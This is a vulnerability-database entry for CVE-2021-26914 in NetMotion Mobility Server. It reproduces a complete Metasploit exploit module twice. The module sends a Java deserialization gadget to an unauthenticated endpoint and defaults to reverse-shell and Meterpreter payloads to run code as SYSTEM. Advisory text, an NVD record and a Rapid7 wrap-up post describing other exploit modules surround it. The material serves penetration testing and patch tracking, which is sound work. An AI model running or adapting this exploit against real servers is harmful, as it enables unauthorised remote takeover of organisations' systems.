NetMotion Mobility Server MvcUtil Java Deserialization

2021-05-18T00:00:00

Description

{"id": "PACKETSTORM:162617", "type": "packetstorm", "bulletinFamily": "exploit", "title": "NetMotion Mobility Server MvcUtil Java Deserialization", "description": "", "published": "2021-05-18T00:00:00", "modified": "2021-05-18T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://packetstormsecurity.com/files/162617/NetMotion-Mobility-Server-MvcUtil-Java-Deserialization.html", "reporter": "mr_me", "references": [], "cvelist": ["CVE-2021-26914"], "immutableFields": [], "lastseen": "2021-05-18T16:10:25", "viewCount": 135, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-26914"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:CBB459355DA52AAEA21DDFD10D5B6FDB"]}, {"type": "srcincite", "idList": ["SRC-2021-0007"]}, {"type": "zdt", "idList": ["1337DAY-ID-36263"]}], "rev": 4}, "score": {"value": 6.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-26914"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:CBB459355DA52AAEA21DDFD10D5B6FDB"]}, {"type": "srcincite", "idList": ["SRC-2021-0007"]}, {"type": "zdt", "idList": ["1337DAY-ID-36263"]}]}, "exploitation": null, "vulnersScore": 6.2}, "sourceHref": "https://packetstormsecurity.com/files/download/162617/netmotion_mobility_mvcutil_deserialization.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::JavaDeserialization \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'NetMotion Mobility Server MvcUtil Java Deserialization', \n'Description' => %q{ \nThis module exploits an unauthenticated Java deserialization in the \nNetMotion Mobility server's MvcUtil.valueStringToObject() method, as \ninvoked through the /mobility/Menu/isLoggedOn endpoint, to execute \ncode as the SYSTEM account. \n \nMobility server versions 11.x before 11.73 and 12.x before 12.02 are \nvulnerable. Tested against 12.01.09045 on Windows Server 2016. \n}, \n'Author' => [ \n'mr_me', # Discovery and PoC \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2021-26914'], \n['URL', 'https://ssd-disclosure.com/ssd-advisory-netmotion-mobility-server-multiple-deserialization-of-untrusted-data-lead-to-rce/'], \n['URL', 'https://www.netmotionsoftware.com/security-advisories/security-vulnerability-in-mobility-web-server-november-19-2020'], \n['URL', 'https://srcincite.io/advisories/src-2021-0007/'] \n], \n'DisclosureDate' => '2021-02-08', # Public disclosure \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Command', \n{ \n'Arch' => ARCH_CMD, \n'Type' => :cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n} \n], \n[ \n'Dropper', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_https' \n} \n} \n], \n[ \n'PowerShell', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_https' \n} \n} \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, # C:\\Program Files\\NetMotion Server\\logs \nARTIFACTS_ON_DISK # CmdStager \n] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path) \n) \n \nunless (version = parse_version(res)) \nreturn CheckCode::Unknown('Failed to parse version from response.') \nend \n \nunless vuln_version?(version) \nreturn CheckCode::Safe(\"NetMotion Mobility #{version} is patched.\") \nend \n \nCheckCode::Appears(\"NetMotion Mobility #{version} is unpatched.\") \nend \n \ndef parse_version(res) \nreturn unless res&.code == 200 \n \n# <img src='/images/menu_logo.png?version=12.01.09045' alt='Mobility' border='0' class='navLogo'> \nres.get_html_document.at('//img[@alt = \"Mobility\"]/@src').to_s[ \n%r{^/images/menu_logo\\.png\\?version=(?<version>[\\d.]+)$}, \n:version # Hat tip @adfoster-r7 \n] \nend \n \ndef vuln_version?(version) \n@vuln_versions ||= \n(11.0...11.73).step(0.01) + # 11.0 through 11.72 \n(12.0...12.02).step(0.01) # 12.0 through 12.01 \n \n@vuln_versions.include?(version.to_f) \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :cmd \nexecute_command(payload.encoded) \nwhen :dropper \nexecute_cmdstager \nwhen :psh \nexecute_command( \ncmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n) \n) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \n# XXX: %Path% is otherwise *only* C:\\Program Files\\NetMotion Server \ncmd.prepend( \n'set Path=%Path%;' \\ \n'C:\\Windows\\System32' \\ \n';' \\ \n'C:\\Windows\\System32\\WindowsPowerShell\\v1.0' \\ \n'&&' \n) \n \nprint_status('Triggering deserialization') \nvprint_status(\"Executing command: #{cmd}\") \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/mobility/Menu/isLoggedOn'), \n'vars_post' => { \n'Mvc_x_Form_x_Name' => go_go_gadget(cmd) \n} \n) \n \nunless res&.code == 200 && res.body == 'false' # If JSESSIONID is missing \nfail_with(Failure::PayloadFailed, 'Failed to trigger deserialization') \nend \n \nprint_good('Successfully triggered deserialization') \nend \n \ndef go_go_gadget(cmd) \nRex::Text.encode_base64( \nRex::Text.gzip( \ngenerate_java_deserialization_for_command( \n'CommonsCollections6', \n'cmd', # cmd.exe \ncmd \n) \n) \n) \nend \n \nend \n`\n", "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646217143}}

{"srcincite": [{"lastseen": "2022-04-20T17:15:38", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers execute arbitrary code on affected installations of NetMotion Mobility Server. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the MvcUtil class. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute arbitrary code in the context of SYSTEM.\n\n**Affected Vendors:**\n\nNetMotion\n\n**Affected Products:**\n\nNetMotion Mobility Server\n\n**Vendor Response:**\n\nNetMotion has issued an update to correct this vulnerability. More details can be found at: <https://www.netmotionsoftware.com/security-advisories/security-vulnerability-in-mobility-web-server-november-19-2020>\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-19T00:00:00", "type": "srcincite", "title": "SRC-2021-0007 : NetMotion Mobility Server MvcUtil valueStringToObject Deserialization of Untrusted Data Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26914"], "modified": "2021-02-08T00:00:00", "id": "SRC-2021-0007", "href": "https://srcincite.io/advisories/src-2021-0007/", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": ""}], "cve": [{"lastseen": "2022-03-23T15:51:37", "description": "NetMotion Mobility before 11.73 and 12.x before 12.02 allows unauthenticated remote attackers to execute arbitrary code as SYSTEM because of Java deserialization in MvcUtil valueStringToObject.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-08T22:15:00", "type": "cve", "title": "CVE-2021-26914", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26914"], "modified": "2021-05-21T16:52:00", "cpe": [], "id": "CVE-2021-26914", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26914", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}], "zdt": [{"lastseen": "2021-12-22T15:16:12", "description": "This Metasploit module exploits an unauthenticated Java deserialization in the NetMotion Mobility server's MvcUtil.valueStringToObject() method, as invoked through the /mobility/Menu/isLoggedOn endpoint, to execute code as the SYSTEM account. Mobility server versions 11.x before 11.73 and 12.x before 12.02 are vulnerable. Tested against 12.01.09045 on Windows Server 2016.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-18T00:00:00", "type": "zdt", "title": "NetMotion Mobility Server MvcUtil Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26914"], "modified": "2021-05-18T00:00:00", "id": "1337DAY-ID-36263", "href": "https://0day.today/exploit/description/36263", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::JavaDeserialization\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'NetMotion Mobility Server MvcUtil Java Deserialization',\n 'Description' => %q{\n This module exploits an unauthenticated Java deserialization in the\n NetMotion Mobility server's MvcUtil.valueStringToObject() method, as\n invoked through the /mobility/Menu/isLoggedOn endpoint, to execute\n code as the SYSTEM account.\n\n Mobility server versions 11.x before 11.73 and 12.x before 12.02 are\n vulnerable. Tested against 12.01.09045 on Windows Server 2016.\n },\n 'Author' => [\n 'mr_me', # Discovery and PoC\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2021-26914'],\n ['URL', 'https://ssd-disclosure.com/ssd-advisory-netmotion-mobility-server-multiple-deserialization-of-untrusted-data-lead-to-rce/'],\n ['URL', 'https://www.netmotionsoftware.com/security-advisories/security-vulnerability-in-mobility-web-server-november-19-2020'],\n ['URL', 'https://srcincite.io/advisories/src-2021-0007/']\n ],\n 'DisclosureDate' => '2021-02-08', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Command',\n {\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Dropper',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ],\n [\n 'PowerShell',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # C:\\Program Files\\NetMotion Server\\logs\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path)\n )\n\n unless (version = parse_version(res))\n return CheckCode::Unknown('Failed to parse version from response.')\n end\n\n unless vuln_version?(version)\n return CheckCode::Safe(\"NetMotion Mobility #{version} is patched.\")\n end\n\n CheckCode::Appears(\"NetMotion Mobility #{version} is unpatched.\")\n end\n\n def parse_version(res)\n return unless res&.code == 200\n\n # <img src='/images/menu_logo.png?version=12.01.09045' alt='Mobility' border='0' class='navLogo'>\n res.get_html_document.at('//img[@alt = \"Mobility\"]/@src').to_s[\n %r{^/images/menu_logo\\.png\\?version=(?<version>[\\d.]+)$},\n :version # Hat tip @adfoster-r7\n ]\n end\n\n def vuln_version?(version)\n @vuln_versions ||=\n (11.0...11.73).step(0.01) + # 11.0 through 11.72\n (12.0...12.02).step(0.01) # 12.0 through 12.01\n\n @vuln_versions.include?(version.to_f)\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n when :psh\n execute_command(\n cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n )\n )\n end\n end\n\n def execute_command(cmd, _opts = {})\n # XXX: %Path% is otherwise *only* C:\\Program Files\\NetMotion Server\n cmd.prepend(\n 'set Path=%Path%;' \\\n 'C:\\Windows\\System32' \\\n ';' \\\n 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0' \\\n '&&'\n )\n\n print_status('Triggering deserialization')\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/mobility/Menu/isLoggedOn'),\n 'vars_post' => {\n 'Mvc_x_Form_x_Name' => go_go_gadget(cmd)\n }\n )\n\n unless res&.code == 200 && res.body == 'false' # If JSESSIONID is missing\n fail_with(Failure::PayloadFailed, 'Failed to trigger deserialization')\n end\n\n print_good('Successfully triggered deserialization')\n end\n\n def go_go_gadget(cmd)\n Rex::Text.encode_base64(\n Rex::Text.gzip(\n generate_java_deserialization_for_command(\n 'CommonsCollections6',\n 'cmd', # cmd.exe\n cmd\n )\n )\n )\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36263", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-05-21T19:40:01", "description": "## Dell DBUtil_2_3.sys IOCTL memmove privilege escalation\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/05/metasploit-blg-3-copy-1.png)\n\nOur very own [zeroSteiner](<https://github.com/zeroSteiner>) added a [new module](<https://github.com/rapid7/metasploit-framework/pull/15190>), which exploits insufficient access control in Dell's `dbutil_2_3.sys` firmware update driver included in the Dell Bios Utility that comes pre-installed with most Windows machines. The driver accepts Input/Output Control (IOCTL) requests without ACL requirements, allowing non-privileged users to perform memory read/write operations via the `memmove` function. This module exploits the arbitrary read/write vulnerability to perform local kernel-mode privilege escalation using the same token upgrade technique developed for the [Win32k ConsoleControl Offset Confusion](<https://github.com/rapid7/metasploit-framework/pull/14907>) exploit. The exploit needs to be run from within at least a Medium integrity process to be successful, and any invalid read/write addresses will result in an immediate blue screen. The module has been tested on Windows version `1803` through `20H2`.\n\n## Windows TokenMagic privilege escalation\n\nMetasploit contributor [jheysel-r7](<https://github.com/jheysel-r7>) added a new exploit module that leverages [TokenMagic](<https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1>) to elevate privileges and execute code as `SYSTEM`. This module can either be used to spawn a malicious service on a target system using the TokenMagic High IL, or it can be used to write a System32 DLL that is vulnerable to hijacking. The service method has been tested against Windows `7`, `8.1`, and `10` (`1511`, `1803`). The DLL method has been tested against Windows `10` (`1703`, `1803`).\n\n## New module content (4)\n\n * [NetMotion Mobility Server MvcUtil Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/15186>) by wvu and mr_me, which exploits [CVE-2021-26914](<https://attackerkb.com/topics/w0xSnwSjtG/cve-2021-26914?referrer=blog>) \\- This adds an exploit for CVE-2021-26914 which is a remotely exploitable vulnerability within NetMotion Mobility, whereby a crafted request can trigger a deserialization vulnerability resulting in code execution.\n * [Dell DBUtil_2_3.sys IOCTL memmove](<https://github.com/rapid7/metasploit-framework/pull/15190>) by Kasif Dekel, SentinelLabs, and Spencer McIntyre, which exploits [CVE-2021-21551](<https://attackerkb.com/topics/zAHZGAFaQX/cve-2021-21551?referrer=blog>) \\- This adds an exploit for CVE-2021-21551 which is an IOCTL that is provided by the DBUtil_2_3.sys driver distributed by Dell that can be abused to perform kernel-mode memory read and write operations.\n * [Windows Privilege Escalation via TokenMagic (UAC Bypass)](<https://github.com/rapid7/metasploit-framework/pull/15168>) by James Forshaw, Ruben Boonen (@FuzzySec), bwatters-r7, and jheysel-r7 - A new module has been added to exploit TokenMagic, an exploitation technique affecting Windows 7 to Windows 10 build 17134 inclusive, that allows users to elevate their privileges to `SYSTEM`. Affected systems can be exploited either via exploiting a DLL hijacking vulnerability affecting Windows 10 build 15063 up to build 17134 inclusive, or by creating a new service on the target system.\n * [SaltStack Salt Information Gatherer](<https://github.com/rapid7/metasploit-framework/pull/15113>) by c2Vlcgo and h00die - This PR adds a post module to gather salt information, configs, etc..\n\n## Enhancements and features\n\n * [#15011](<https://github.com/rapid7/metasploit-framework/pull/15011>) from [acammack-r7](<https://github.com/acammack-r7>) \\- Enhances the analyze command to show additional information about an identified exploit being immediately runnable, or if it requires additional credentials or options to be set before being ran\n * [#15146](<https://github.com/rapid7/metasploit-framework/pull/15146>) from [smashery](<https://github.com/smashery>) \\- This makes two improvements to the exploit for [CVE-2021-3156](<https://attackerkb.com/topics/krVyNG9US8/cve-2021-3156-baron-samedit?referrer=blog>) (Baron Samedit). It removes the dependency on GCC being present in the target environment. It also adds new targets for Ubuntu 16.04, Ubuntu 14.04, CentOS 7, CentOS 8 and Fedora 23-27.\n * [#15178](<https://github.com/rapid7/metasploit-framework/pull/15178>) from [pingport80](<https://github.com/pingport80>) \\- The `auxiliary/client/telegram/send_message.rb` module has been updated to support sending documents as well as to send documents and/or messages to multiple chat IDs.\n * [#15202](<https://github.com/rapid7/metasploit-framework/pull/15202>) from [h00die](<https://github.com/h00die>) \\- The list of WordPress plugins and themes have been updated to allow users to discover more plugins and themes when running tools such as `auxiliary/scanner/http/wordpress_scanner`\n * [#15210](<https://github.com/rapid7/metasploit-framework/pull/15210>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The documentation for `exploit/multi/http/gitlab_file_read_rce` has been updated to provide additional information on how to set GitLab up with a SSL certificate for encrypted communications, allowing users to easily test scenarios in which an encrypted GitLab connection might be needed.\n * [#15212](<https://github.com/rapid7/metasploit-framework/pull/15212>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Metasploit modules implemented in Python now explicitly require python3 to be present on the system path. This ensures that python2 is no longer used unintentionally, which previously occurred on Kali systems\n\n## Bugs fixed\n\n * [#15196](<https://github.com/rapid7/metasploit-framework/pull/15196>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- A bug has been fixed in the `msfdb` script that prevented users from being able to run the script if they installed Metasploit into a location that contained spaces within its path.\n * [#15205](<https://github.com/rapid7/metasploit-framework/pull/15205>) from [willy00](<https://github.com/willy00>) \\- A bug has been fixed in the `exploit/multi/http/gitlab_file_read_rce` module to allow it to target vulnerable GitLab servers where TLS is enabled.\n * [#15213](<https://github.com/rapid7/metasploit-framework/pull/15213>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- A fix has been applied to `msfdb` to use the passed in SSL key path (if provided) instead of the default one at `~/.msf4/msf-ws-key.pem`, which may not exist if users have passed in a SSL key path as an option.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.44...6.0.45](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-05-12T18%3A09%3A40-05%3A00..2021-05-19T10%3A47%3A33-05%3A00%22>)\n * [Full diff 6.0.44...6.0.45](<https://github.com/rapid7/metasploit-framework/compare/6.0.44...6.0.45>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-05-21T19:11:44", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21551", "CVE-2021-26914", "CVE-2021-3156"], "modified": "2021-05-21T19:11:44", "id": "RAPID7BLOG:CBB459355DA52AAEA21DDFD10D5B6FDB", "href": "https://blog.rapid7.com/2021/05/21/metasploit-wrap-up-112/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}

NetMotion Mobility Server MvcUtil Java Deserialization

Description

Related